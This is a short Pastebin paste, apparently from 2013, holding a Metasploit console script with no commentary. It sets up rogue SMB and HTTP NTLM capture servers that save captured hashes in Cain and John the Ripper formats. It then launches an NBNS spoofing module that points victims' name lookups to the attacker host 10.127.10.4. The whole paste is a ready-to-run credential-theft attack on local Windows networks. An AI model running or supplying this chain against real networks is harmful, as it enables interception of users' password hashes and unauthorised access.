Advertisement
leonteale

netbios - msfconsole

Sep 10th, 2013
360
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 0.42 KB | None | 0 0
  1. use auxiliary/server/capture/smb
  2. set CAINPWFILE /netbios/cain.
  3. set JOHNPWFILE /netbios/john.
  4.  
  5. set LOGFILE /tmp/SMB_LOG.txt
  6. set SRVHOST 10.127.10.4
  7. run
  8.  
  9. use auxiliary/server/capture/http_ntlm
  10. set CAINPWFILE /netbios/cain-http
  11. set JOHNPWFILE /netbios/john-http
  12. set SRVHOST 10.127.10.4
  13. set SRVPORT 80
  14. set URIPATH /
  15. run
  16.  
  17. use auxiliary/spoof/nbns/nbns_response
  18. set INTERFACE eth0
  19. set SPOOFIP 10.127.10.4
  20. run
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement